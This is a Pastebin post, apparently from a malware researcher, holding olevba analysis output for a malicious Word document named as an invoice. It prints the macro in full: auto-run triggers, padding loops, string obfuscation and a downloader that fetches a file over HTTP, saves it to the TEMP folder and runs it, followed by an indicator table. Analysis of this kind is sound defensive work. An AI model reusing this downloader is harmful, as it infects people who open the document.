dynamoo

Malicious Word macro

Dec 15th, 2015
319
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. olevba 0.41 - http://decalage.info/python/oletools
  2. Flags        Filename                                                        
  3. -----------  -----------------------------------------------------------------
  4. OpX:MASIHB-V invoic~1.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: invoic~1.doc
  10. Type: OpenXML
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: word/vbaProject.bin - OLE stream: u'VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. Sub JSUrgGsyv()
  16. 'tmpo22
  17.  
  18. Dim JdgReyjd As Integer
  19.  
  20. Dim ShdwdjJds As Integer
  21. ShdwdjJds = 6
  22. Do While ShdwdjJds < 59
  23. DoEvents: ShdwdjJds = ShdwdjJds + 1
  24. Loop
  25.  
  26. JdgReyjd = 4
  27. Do While JdgReyjd < 81
  28.  
  29. Dim uYetBsjfhs As Integer
  30. uYetBsjfhs = 8
  31. Do While uYetBsjfhs < 72
  32. DoEvents: uYetBsjfhs = uYetBsjfhs + 1
  33. Loop
  34.  
  35. DoEvents: JdgReyjd = JdgReyjd + 1
  36.  
  37. Loop
  38.  
  39.  
  40. Dim PsiosJstwvd As Integer
  41. PsiosJstwvd = 2
  42. Do While PsiosJstwvd < 25
  43. DoEvents: PsiosJstwvd = PsiosJstwvd + 1
  44. Loop
  45.  
  46. UIkcdidYs
  47. End Sub
  48. Sub AutoOpen()
  49.  
  50. Dim iUwuUWuxc As Integer
  51.  
  52. Dim pojxwSdc As Integer
  53. pojxwSdc = 4
  54. Do While pojxwSdc < 77
  55. DoEvents: pojxwSdc = pojxwSdc + 1
  56. Loop
  57.  
  58. iUwuUWuxc = 6
  59. Do While iUwuUWuxc < 29
  60.  
  61. Dim FoewfdSy As Integer
  62. FoewfdSy = 9
  63. Do While FoewfdSy < 34
  64. DoEvents: FoewfdSy = FoewfdSy + 1
  65. Loop
  66.  
  67. DoEvents: iUwuUWuxc = iUwuUWuxc + 1
  68.  
  69. Loop
  70.  
  71.  
  72. Dim AdhsajhEc As Integer
  73. AdhsajhEc = 7
  74. Do While AdhsajhEc < 89
  75. DoEvents: AdhsajhEc = AdhsajhEc + 1
  76. Loop
  77.  
  78.     JSUrgGsyv
  79. End Sub
  80. Sub Workbook_Open()
  81.  
  82. Dim IowxJDdsr As Integer
  83.  
  84. Dim bGdkaJjdsd As Integer
  85. bGdkaJjdsd = 4
  86. Do While bGdkaJjdsd < 71
  87. DoEvents: bGdkaJjdsd = bGdkaJjdsd + 1
  88. Loop
  89.  
  90. IowxJDdsr = 5
  91. Do While IowxJDdsr < 75
  92.  
  93. Dim wSfowpcD As Integer
  94. wSfowpcD = 7
  95. Do While wSfowpcD < 88
  96. DoEvents: wSfowpcD = wSfowpcD + 1
  97. Loop
  98.  
  99. DoEvents: IowxJDdsr = IowxJDdsr + 1
  100. Loop
  101.  
  102.  
  103. Dim iAcvpaJHdc As Integer
  104. iAcvpaJHdc = 6
  105. Do While iAcvpaJHdc < 56
  106. DoEvents: iAcvpaJHdc = iAcvpaJHdc + 1
  107. Loop
  108.  
  109.     JSUrgGsyv
  110. End Sub
  111.  
  112.  
  113.  
  114.  
  115.  
  116. -------------------------------------------------------------------------------
  117. VBA MACRO trekdddjvjb.bas
  118. in file: word/vbaProject.bin - OLE stream: u'VBA/trekdddjvjb'
  119. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  120. Public Function oPlKtRebGf()
  121. hyyuejkjs = "/x16"
  122. yyeidsadf = "56/d"
  123. iuyhgdfsdf = oGdyeJdhsdd.TextBox1
  124. yeuijjffsa = "fiubgh5.exe"
  125. oPlKtRebGf = oGdyeJdhsdd.TextBox4 + iuyhgdfsdf + hyyuejkjs + yyeidsadf + yeuijjffsa
  126. End Function
  127.  
  128.  
  129.  
  130. -------------------------------------------------------------------------------
  131. VBA MACRO oerdkaksnc.bas
  132. in file: word/vbaProject.bin - OLE stream: u'VBA/oerdkaksnc'
  133. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  134. Public Function nHdiPwTgFsd()
  135.  
  136. nHdiPwTgFsd = Environ(jduyewiskd.uYtbdTsc) & Chr$(47) & Chr$(115) & Chr$(104) & Chr$(101) & Chr$(114) & Chr$(101) & Chr$(100) & Chr$(101) & Chr$(114) + oGdyeJdhsdd.TextBox3
  137.  
  138. End Function
  139.  
  140.  
  141.  
  142.  
  143.  
  144.  
  145.  
  146.  
  147.  
  148.  
  149.  
  150.  
  151.  
  152.  
  153.  
  154.  
  155.  
  156.  
  157.  
  158.  
  159.  
  160. -------------------------------------------------------------------------------
  161. VBA MACRO jduyewiskd.bas
  162. in file: word/vbaProject.bin - OLE stream: u'VBA/jduyewiskd'
  163. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  164. Public Function uYtbdTsc()
  165.  uYtbdTsc = StrReverse("PMET")
  166. End Function
  167. Public Function IdjcTrsj()
  168. IdjcTrsj = StrReverse("PTTHLMX.tfosorciM")
  169. End Function
  170. Public Function ThWockSv()
  171. ThWockSv = StrReverse("maertS.BDODA")
  172. End Function
  173.  
  174.  
  175.  
  176.  
  177.  
  178.  
  179.  
  180.  
  181.  
  182.  
  183.  
  184.  
  185.  
  186.  
  187.  
  188.  
  189.  
  190.  
  191.  
  192.  
  193.  
  194. -------------------------------------------------------------------------------
  195. VBA MACRO aIuhYqZk.bas
  196. in file: word/vbaProject.bin - OLE stream: u'VBA/aIuhYqZk'
  197. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  198. Sub UIkcdidYs()
  199.  
  200. Set dsfgty = CreateObject(jduyewiskd.IdjcTrsj)
  201.  
  202. Dim uehdbcxsd As Integer
  203. uehdbcxsd = 7
  204. Do While uehdbcxsd < 66
  205. DoEvents: uehdbcxsd = uehdbcxsd + 1
  206. Loop
  207.  
  208. dsfgty.Open StrReverse("TSOP"), trekdddjvjb.oPlKtRebGf, False
  209.  
  210. Dim kiwqazbcf As Integer
  211. kiwqazbcf = 5
  212. Do While kiwqazbcf < 78
  213. DoEvents: kiwqazbcf = kiwqazbcf + 1
  214. Loop
  215.  
  216. dsfgty.send
  217.  
  218. Dim ieywhdcba As Integer
  219. ieywhdcba = 9
  220. Do While ieywhdcba < 38
  221. DoEvents: ieywhdcba = ieywhdcba + 1
  222. Loop
  223.  
  224. uwopdhftes dsfgty
  225.  
  226. Dim tRekfhgwv As Integer
  227. tRekfhgwv = 9
  228. Do While tRekfhgwv < 82
  229. DoEvents: tRekfhgwv = tRekfhgwv + 1
  230. Loop
  231.  
  232. Shell oGdyeJdhsdd.bhjsdfvcjdds
  233. End Sub
  234.  
  235. Function uwopdhftes(ByVal jfytwjhdb)
  236.  
  237.     Set xxxcvcxvb = CreateObject(jduyewiskd.ThWockSv)
  238.  
  239. Dim OpHfreohd As Integer
  240. OpHfreohd = 4
  241. Do While OpHfreohd < 54
  242. DoEvents: OpHfreohd = OpHfreohd + 1
  243. Loop
  244.  
  245.     xxxcvcxvb.Open
  246.  
  247. Dim IuwSjskwq As Integer
  248. IuwSjskwq = 4
  249. Do While IuwSjskwq < 67
  250. DoEvents: IuwSjskwq = IuwSjskwq + 1
  251. Loop
  252.  
  253.     xxxcvcxvb.Type = 2 - 1
  254.  
  255. Dim jHewysLd As Integer
  256. jHewysLd = 7
  257. Do While jHewysLd < 84
  258. DoEvents: jHewysLd = jHewysLd + 1
  259. Loop
  260.  
  261.     xxxcvcxvb.Write jfytwjhdb.responseBody
  262.  
  263. Dim oYeBsdhd As Integer
  264. oYeBsdhd = 4
  265. Do While oYeBsdhd < 76
  266. DoEvents: oYeBsdhd = oYeBsdhd + 1
  267. Loop
  268.  
  269.     xxxcvcxvb.SaveToFile oerdkaksnc.nHdiPwTgFsd, 3 - 1
  270.  
  271. Dim YrtGfdvzw As Integer
  272. YrtGfdvzw = 6
  273. Do While YrtGfdvzw < 63
  274. DoEvents: YrtGfdvzw = YrtGfdvzw + 1
  275. Loop
  276.  
  277.     xxxcvcxvb.Close
  278.  
  279. End Function
  280.  
  281.  
  282.  
  283.  
  284.  
  285.  
  286.  
  287.  
  288.  
  289.  
  290.  
  291.  
  292.  
  293.  
  294.  
  295.  
  296.  
  297.  
  298.  
  299.  
  300.  
  301. -------------------------------------------------------------------------------
  302. VBA MACRO oGdyeJdhsdd.frm
  303. in file: word/vbaProject.bin - OLE stream: u'VBA/oGdyeJdhsdd'
  304. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  305. Private Sub TextBox1_Change()
  306.  
  307. End Sub
  308. -------------------------------------------------------------------------------
  309. VBA MACRO Class1.cls
  310. in file: word/vbaProject.bin - OLE stream: u'VBA/Class1'
  311. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  312. (empty macro)
  313. -------------------------------------------------------------------------------
  314. VBA MACRO Class2.cls
  315. in file: word/vbaProject.bin - OLE stream: u'VBA/Class2'
  316. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  317. (empty macro)
  318. -------------------------------------------------------------------------------
  319. VBA MACRO Class3.cls
  320. in file: word/vbaProject.bin - OLE stream: u'VBA/Class3'
  321. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  322. (empty macro)
  323. -------------------------------------------------------------------------------
  324. VBA MACRO Class4.cls
  325. in file: word/vbaProject.bin - OLE stream: u'VBA/Class4'
  326. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  327. (empty macro)
  328. -------------------------------------------------------------------------------
  329. VBA MACRO Class5.cls
  330. in file: word/vbaProject.bin - OLE stream: u'VBA/Class5'
  331. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  332. (empty macro)
  333. -------------------------------------------------------------------------------
  334. VBA MACRO Class6.cls
  335. in file: word/vbaProject.bin - OLE stream: u'VBA/Class6'
  336. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  337. (empty macro)
  338. -------------------------------------------------------------------------------
  339. VBA MACRO Class7.cls
  340. in file: word/vbaProject.bin - OLE stream: u'VBA/Class7'
  341. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  342. (empty macro)
  343. -------------------------------------------------------------------------------
  344. VBA MACRO Class8.cls
  345. in file: word/vbaProject.bin - OLE stream: u'VBA/Class8'
  346. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  347. (empty macro)
  348. -------------------------------------------------------------------------------
  349. VBA MACRO Class9.cls
  350. in file: word/vbaProject.bin - OLE stream: u'VBA/Class9'
  351. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  352. (empty macro)
  353. -------------------------------------------------------------------------------
  354. VBA MACRO Class10.cls
  355. in file: word/vbaProject.bin - OLE stream: u'VBA/Class10'
  356. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  357. (empty macro)
  358. +------------+----------------------+-----------------------------------------+
  359. | Type       | Keyword              | Description                             |
  360. +------------+----------------------+-----------------------------------------+
  361. | AutoExec   | AutoOpen             | Runs when the Word document is opened   |
  362. | AutoExec   | Workbook_Open        | Runs when the Excel Workbook is opened  |
  363. | Suspicious | Open                 | May open a file                         |
  364. | Suspicious | Shell                | May run an executable file or a system  |
  365. |            |                      | command                                 |
  366. | Suspicious | CreateObject         | May create an OLE object                |
  367. | Suspicious | Chr                  | May attempt to obfuscate specific       |
  368. |            |                      | strings                                 |
  369. | Suspicious | StrReverse           | May attempt to obfuscate specific       |
  370. |            |                      | strings                                 |
  371. | Suspicious | SaveToFile           | May create a text file                  |
  372. | Suspicious | Environ              | May read system environment variables   |
  373. | Suspicious | Write                | May write to a file (if combined with   |
  374. |            |                      | Open)                                   |
  375. | Suspicious | ADODB.Stream         | May create a text file (obfuscation:    |
  376. |            |                      | VBA expression)                         |
  377. | Suspicious | Microsoft.XMLHTTP    | May download files from the Internet    |
  378. |            |                      | (obfuscation: VBA expression)           |
  379. | Suspicious | Hex Strings          | Hex-encoded strings were detected, may  |
  380. |            |                      | be used to obfuscate strings (option    |
  381. |            |                      | --decode to see all)                    |
  382. | Suspicious | Base64 Strings       | Base64-encoded strings were detected,   |
  383. |            |                      | may be used to obfuscate strings        |
  384. |            |                      | (option --decode to see all)            |
  385. | Suspicious | VBA obfuscated       | VBA string expressions were detected,   |
  386. |            | Strings              | may be used to obfuscate strings        |
  387. |            |                      | (option --decode to see all)            |
  388. | IOC        | fiubgh5.exe          | Executable file name                    |
  389. | VBA string | /shereder            | Chr$(47) & Chr$(115) & Chr$(104) &      |
  390. |            |                      | Chr$(101) & Chr$(114) & Chr$(101) &     |
  391. |            |                      | Chr$(100) & Chr$(101) & Chr$(114)       |
  392. | VBA string | TEMP                 | StrReverse("PMET")                      |
  393. | VBA string | Microsoft.XMLHTTP    | StrReverse("PTTHLMX.tfosorciM")         |
  394. | VBA string | ADODB.Stream         | StrReverse("maertS.BDODA")              |
  395. | VBA string | POST                 | StrReverse("TSOP")                      |
  396. +------------+----------------------+-----------------------------------------+
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×